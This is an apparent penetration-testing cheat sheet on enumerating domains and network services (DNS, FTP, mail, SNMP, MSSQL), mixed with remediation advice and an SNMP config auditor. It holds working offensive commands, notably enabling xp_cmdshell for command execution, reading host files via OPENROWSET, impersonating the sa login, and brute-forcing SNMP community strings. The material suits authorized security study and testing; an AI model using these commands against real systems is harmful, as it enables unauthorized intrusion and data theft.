```bash
# Domain => Subdomains via certificate transparency logs (crt.sh)
# q=<DOMAIN> matches certificates issued for that exact name; q=%25.<DOMAIN>
# (URL-encoded "%.<DOMAIN>") matches every subdomain.
# jq -r expands the "\n"-joined SAN list into real lines; sed strips "*." wildcards.
curl -s "https://crt.sh/?q=<DOMAIN>&output=json" \
  | jq -r '.[].name_value' \
  | sed 's/^\*\.//' \
  | sort -u \
  | tee subdomainlist.txt

# Full info for each subdomain
for i in $(cat subdomainlist.txt); do host $i | tee -a hostinfo.txt; done

# (IPv4) Domain Name => IP Address
for i in $(cat subdomainlist.txt); do host $i | grep "has address" | cut -d" " -f1,4 | tee -a domain_ipaddress.txt; done

# (IPv4) Addresses Only (second column of the pairs above, deduplicated)
cut -d" " -f2 domain_ipaddress.txt | sort -u | tee ip-addresses.txt

# (IPv4) Addresses => Services via Shodan
for i in $(cat ip-addresses.txt); do shodan host $i; done

# DNS: old technique (many authoritative servers now answer ANY with a minimal response, RFC 8482)
dig any <DOMAIN>
```

```text
# Content Search: google.com Dork
inurl:<DOMAIN> intext:<TERM>
```
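The crt.sh -> host -> IP pipeline above, rewritten as shell functions and exercised offline on constructed input. This is an added example, not part of the original notes; it assumes crt.sh's JSON carries one `name_value` string per certificate with SANs separated by a literal `\n`, and that `host` prints IPv4 answers as `<name> has address <ip>`. The sample JSON, the `host` output and the 192.0.2.x addresses are constructed for the example.

```bash
#!/bin/sh
# Added example (not from the original notes). Assumptions: crt.sh JSON shape
# {"name_value":"a\nb\n..."} per entry; `host` output "<name> has address <ip>".
# Sample data below is constructed (reserved example.com, RFC 5737 addresses).

# Extract unique, lowercase, non-wildcard hostnames belonging to $1 from
# crt.sh JSON on stdin. Wildcard SANs (*.example.com) are reduced to the base
# name rather than dropped, since the base usually resolves too. Names that
# merely end in the domain string (notexample.com) are filtered out.
crtsh_subdomains() {
    esc=$(printf '%s' "$1" | sed 's/\./\\./g')      # escape dots for the regex
    grep -o '"name_value":"[^"]*"' \
        | cut -d'"' -f4 \
        | awk '{ gsub(/\\n/, "\n") } 1' \
        | sed 's/^\*\.//' \
        | tr '[:upper:]' '[:lower:]' \
        | grep -E "(^|\.)${esc}\$" \
        | sort -u
}

# Keep only IPv4 "has address" lines from `host` output; print "<name> <ip>".
# IPv6 lines read "has IPv6 address" and are skipped by the $3 check.
host_to_pairs() {
    awk '$2 == "has" && $3 == "address" { print $1, $4 }'
}

# Second column of the pairs, deduplicated: the list to feed to Shodan/nmap.
unique_ips() {
    awk '{ print $2 }' | sort -u
}

# Constructed crt.sh response: two certificates, one with a wildcard SAN, a
# mixed-case duplicate, and an unrelated name that only ends in "example.com".
SAMPLE_CRTSH='[{"issuer_name":"C=US, O=Example CA, CN=Example R1","common_name":"www.example.com","name_value":"www.example.com\nexample.com"},{"issuer_name":"CN=Other CA","common_name":"*.example.com","name_value":"*.example.com\nmail.example.com\nMail.Example.com\nnotexample.com"}]'

# Constructed `host` output for the names found above.
SAMPLE_HOST='www.example.com has address 192.0.2.10
www.example.com has IPv6 address 2001:db8::10
mail.example.com has address 192.0.2.11
example.com has address 192.0.2.10'

printf '%s\n' "$SAMPLE_CRTSH" | crtsh_subdomains example.com
printf '%s\n' "$SAMPLE_HOST" | host_to_pairs
printf '%s\n' "$SAMPLE_HOST" | host_to_pairs | unique_ips
```

Against a live target, replace the two `printf` feeds with `curl -s "https://crt.sh/?q=%25.<DOMAIN>&output=json"` and a loop over `host`; the functions do not change. The domain filter matters because crt.sh's `%` wildcard also returns certificates whose SAN list mixes in unrelated names.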
LLMNR & NBT-NS
UDP 5355: LLMNR (modern)
UDP 137: NBT-NS (ancient)
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components used as fallback name-resolution protocols when DNS cannot resolve a name.
A Windows host attempts to resolve a hostname in this order:
1. Local HOSTS file.
2. DNS cache, then the configured DNS server.
3. If DNS fails: LLMNR multicast (UDP 5355).
4. If LLMNR fails: NBT-NS broadcast (UDP 137).
Steps 3 and 4 accept an answer from any host on the local segment, so a machine that asks for a mistyped or non-existent name can be answered by an attacker and tricked into authenticating to it. That is why both protocols are a poisoning target.
Remediation
Disable LLMNR and NBT-NS, rolling the change out cautiously (test for breakage, e.g. legacy apps that rely on NetBIOS names) at the host or network level.
Disable LLMNR via Group Policy:
Computer Configuration –>
Administrative Templates –>
Network –>
DNS Client –>
Enable "Turn OFF Multicast Name Resolution"
(This sets the registry value EnableMulticast = 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient.)
Disable NBT-NS (per host in the GUI, or at scale via a GPO startup script / PowerShell that writes the registry value below):
Control Panel –>
Network and Sharing Center –>
Change adapter settings –>
Right-click the adapter –> Properties –>
Internet Protocol Version 4 (TCP/IPv4) –> Properties –> Advanced –> WINS tab –>
Select "Disable NetBIOS over TCP/IP"
(This sets NetbiosOptions = 2 under HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_<GUID>, once per interface, which is why a script is preferable to clicking through every adapter.)
Dangerous setting: allowing the write-capable FTP commands STOR, DELE, RNFR, RNTO, MKD, RMD, APPE and SITE (upload, delete, rename, create/remove directory, append, server-specific commands), which is especially dangerous in combination with anonymous login.
```bash
# Connect to FTP server in passive mode with anonymous login
# Username: anonymous
# Password: (no password required; some servers expect an email-style string)
ftp -p -a <TARGET>
ftp -p ftp://<USER>:<PASS>@<TARGET>
```

```text
# Inside the ftp> session:
# Turn off passive mode
passive
# List files and directories (recursive)
ls -la
ls -laR
# Read file to stdout without saving it
get <FILENAME> -
# Download file
get <FILENAME>
# Upload file
put <FILENAME>
# Execute local commands (outside of session)
!<COMMAND>
```

```bash
# Download ALL files (wget mirrors into a directory named after the host)
mkdir ftp_files && cd ftp_files
wget -m --no-passive-ftp ftp://anonymous:anonymous@<TARGET>
```
A related debug setting raises log verbosity so that submitted passwords, and the password scheme, get logged.

| Setting | Description |
|---|---|
| auth_verbose | Logs unsuccessful authentication attempts and their reasons. |
| auth_verbose_passwords | Passwords used for authentication are logged (can be truncated to a prefix). |
| auth_anonymous_username | The username used when logging in with the ANONYMOUS SASL mechanism. |

Any password-logging option turns the mail server's log into a credential store for whoever can read it (including an attacker with file read on the host).
```bash
# Enumerate
sudo nmap -n -Pn -sV -sC -p25,110,143,465,587,993,995 <TARGET>
```

```bash
### Non-Interactive
# IMAPS (-X sends one raw protocol command; note the space before the URL)
curl -vkL --user '<USER>:<PASSWORD>' 'imaps://<TARGET>' -X '<COMMAND>'
# POP3S
curl -vkL --user '<USER>:<PASSWORD>' 'pop3s://<TARGET>' -X '<COMMAND>'
```

```bash
### Interactive
# IMAPS
openssl s_client -connect <TARGET>:imaps
```

```text
# IMAP commands (the leading "1" is a client-chosen tag the server echoes back)
1 LOGIN <USERNAME> <PASSWORD>
1 LIST "" *                     # Lists all mailboxes
1 SELECT "<MAILBOX>"            # Selects a mailbox
1 UNSELECT                      # Exits the selected mailbox (takes no argument)
1 FETCH <ID> all                # Metadata of an email
1 FETCH 1:* (BODY[])            # Show all emails
1 CREATE "INBOX"                # Creates a mailbox with the given name
1 DELETE "INBOX"                # Deletes a mailbox
1 RENAME "ToRead" "Important"   # Renames a mailbox
1 LSUB "" *                     # Returns the names the user has marked active or subscribed
1 CLOSE                         # Expunges messages flagged \Deleted and closes the mailbox
1 LOGOUT                        # Closes the connection
```

```bash
# POP3S
openssl s_client -connect <TARGET>:pop3s
```

```text
USER <USERNAME>
PASS <PASSWORD>
STAT          # Number and total size of emails on the server
LIST          # Number and size of each email
RETR <ID>     # Retrieve the email with this ID
DELE <ID>     # Mark the email with this ID for deletion (applied at QUIT)
CAPA          # Display the server capabilities
RSET          # Unmark messages marked for deletion
QUIT          # Close the connection (commits deletions)
```
Default MySQL databases:
mysql - the system database that contains tables storing information required by the MySQL server
information_schema - provides access to database metadata
performance_schema - monitors MySQL Server execution at a low level
sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
secure_file_priv controls where LOAD_FILE(), LOAD DATA and SELECT ... INTO OUTFILE may read and write, and may be set as follows:
If empty, the variable has no effect: files can be read from and written to anywhere the mysqld OS user has access, which is not a secure setting.
If set to the name of a directory, the server limits import and export operations to files in that directory. The directory must exist; the server does not create it.
If set to NULL, the server disables import and export operations entirely.
With this setting, the SMTP server relays mail from anyone (an open relay): an attacker can send forged emails and thus initiate communication between multiple parties, or spoof a sender address and read the replies that come back.
The Management Information Base (MIB) is a text file that defines the Object Identifiers (OIDs) used to address device information; it is written in an ASCII text format based on Abstract Syntax Notation One (ASN.1). Community strings act as the "passwords" that determine the access level (read-only or read/write). In SNMP v1 and v2c they travel in cleartext, so anyone on the path can read them.
Dangerous Settings

| Settings | Description |
|---|---|
| rwuser noauth | Provides access to the full OID tree without authentication. |
| rwcommunity <COMMUNITY_STRING> <IPv4_ADDR> | Provides access to the full OID tree regardless of where the requests were sent from. |
| rwcommunity6 <COMMUNITY_STRING> <IPv6_ADDR> | Same access as with rwcommunity, with the difference of using IPv6. |
```bash
# Enum via nmap
sudo nmap -n -Pn -sU -p161 -sV --script 'snmp*' --reason -oA nmap_snmp_scan <TARGET>

### Brute-force names of Community Strings
# - Default strings "public" (Read-Only) and "private" (Read/Write) are common
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt <TARGET>
# probably "public"

### Walk OIDs and info
# -v 1, 2c or 3
snmpwalk -v <VERSION> -c <COMMUNITY_STRING> <TARGET> .1

### Brute-force OIDs (fast, parallel)
# -2 : use v2c (braa defaults to version 1)
braa <COMMUNITY_STRING>@<TARGET>:.1.*
braa <COMMUNITY_STRING>@<TARGET>:.1.3.6.*
```
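A weak snmpd.conf beside a hardened one, plus a small audit function that flags the dangerous directives from the table above. This is an added example, not part of the original notes; both configuration texts are constructed for it and assume Net-SNMP directive syntax (rocommunity/rwcommunity, rwcommunity6, rwuser, rouser, createUser). The community names, user name and passphrases are placeholders.

```bash
#!/bin/sh
# Added example (not from the original notes). Both configs below are
# constructed; directive syntax is Net-SNMP's snmpd.conf.

# Weak: guessable community names, read/write allowed from any source
# (no source restriction), and a v3 user that needs no authentication.
WEAK_SNMPD_CONF='# snmpd.conf (weak, constructed)
rocommunity public
rwcommunity private
rwcommunity6 private
rwuser admin noauth'

# Hardened: read-only community pinned to the management subnet, no rw
# community at all, and a v3 user that must authenticate and encrypt (priv).
HARDENED_SNMPD_CONF='# snmpd.conf (hardened, constructed)
rocommunity mgmt-ro 192.0.2.0/24
createUser monitor SHA "REPLACE-auth-passphrase" AES "REPLACE-priv-passphrase"
rouser monitor priv'

# Read an snmpd.conf on stdin, print one FINDING line per dangerous directive,
# and return 1 if any were found (0 when clean). Comments and blanks are skipped.
# A missing source field, or the literal "default", means "any source".
audit_snmpd_conf() {
    awk '
        /^[ \t]*#/ || NF == 0 { next }
        $1 == "rwcommunity" || $1 == "rwcommunity6" {
            if (NF < 3 || $3 == "default")
                print "FINDING: " $1 " \"" $2 "\" grants read/write from any source"
            else
                print "FINDING: " $1 " \"" $2 "\" grants read/write (prefer rouser with priv)"
            found = 1
        }
        ($1 == "rocommunity" || $1 == "rocommunity6") && ($2 == "public" || NF < 3 || $3 == "default") {
            print "FINDING: " $1 " \"" $2 "\" is guessable or unrestricted by source"
            found = 1
        }
        $1 == "rwuser" && $3 == "noauth" {
            print "FINDING: rwuser " $2 " may write without authentication"
            found = 1
        }
        END { exit (found ? 1 : 0) }
    '
}

# Number of findings, for scripting (always exits 0; grep -c prints 0 when none).
count_findings() {
    audit_snmpd_conf | grep -c '^FINDING:' || true
}

echo "== weak =="
printf '%s\n' "$WEAK_SNMPD_CONF" | audit_snmpd_conf || echo "-> dangerous directives present"
echo "== hardened =="
printf '%s\n' "$HARDENED_SNMPD_CONF" | audit_snmpd_conf && echo "-> no findings"
```

On a real host run `audit_snmpd_conf < /etc/snmp/snmpd.conf`. The hardened form keeps a read-only v2c community only because some monitoring still needs it; if everything speaks v3, drop the rocommunity line too, since v1/v2c community strings are sent in cleartext.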
Default MSSQL databases:
master - keeps the information for an instance of SQL Server.
msdb - used by SQL Server Agent.
model - a template database copied for each new database.
resource - a read-only database that keeps system objects visible in every database on the server in the sys schema.
tempdb - keeps temporary objects for SQL queries.
xp_cmdshell:
xp_cmdshell is a powerful feature and is disabled by default. It can be enabled and disabled using Policy-Based Management or by executing sp_configure.
The Windows process spawned by xp_cmdshell has the same security rights as the SQL Server service account, so a sysadmin login on an instance running as a privileged account is a host compromise.
xp_cmdshell operates synchronously: control is not returned to the caller until the command-shell command completes.
Weak or default sa credentials: admins may forget to disable or rename this account.
```bash
# Enumerate via nmap
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <TARGET>
```

```text
# Enumerate via MSF
use auxiliary/scanner/mssql/mssql_ping
set RHOSTS <TARGET>
run
```
```bash
### Login via Windows auth
impacket-mssqlclient -windows-auth <DOMAIN>/<USER>@<TARGET>
### Login via SQL auth
impacket-mssqlclient <USER>:<PASSWORD>@<TARGET>
```

```sql
SELECT @@version;
SELECT user_name();
SELECT system_user;
SELECT IS_SRVROLEMEMBER('sysadmin'); -- 1 = current login is sysadmin, 0 = not, NULL = role name invalid
-- Users (server logins)
SELECT name FROM master..syslogins;
-- Databases
SELECT name FROM master..sysdatabases;
-- Tables in a database
USE <DATABASE>;
SELECT name FROM sys.tables;
```

Read Files
```sql
-- Requires ADMINISTER BULK OPERATIONS (sysadmin/bulkadmin); reads as the service account
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents;
```

enable_xp_cmdshell
```sql
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell '<COMMAND>';
-- or run the command through a linked server (executes there, as that server's service account)
EXECUTE('xp_cmdshell ''<DOS_CMD>''') AT [<LINKED_SERVER>];
```

Impersonate User
```sql
-- Logins the current login has been granted IMPERSONATE on
SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';
GO
-- Impersonating the sa login
USE master
EXECUTE AS LOGIN = 'sa'
-- Verify
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- 0 is NOT admin, 1 is admin; REVERT drops the impersonated context
```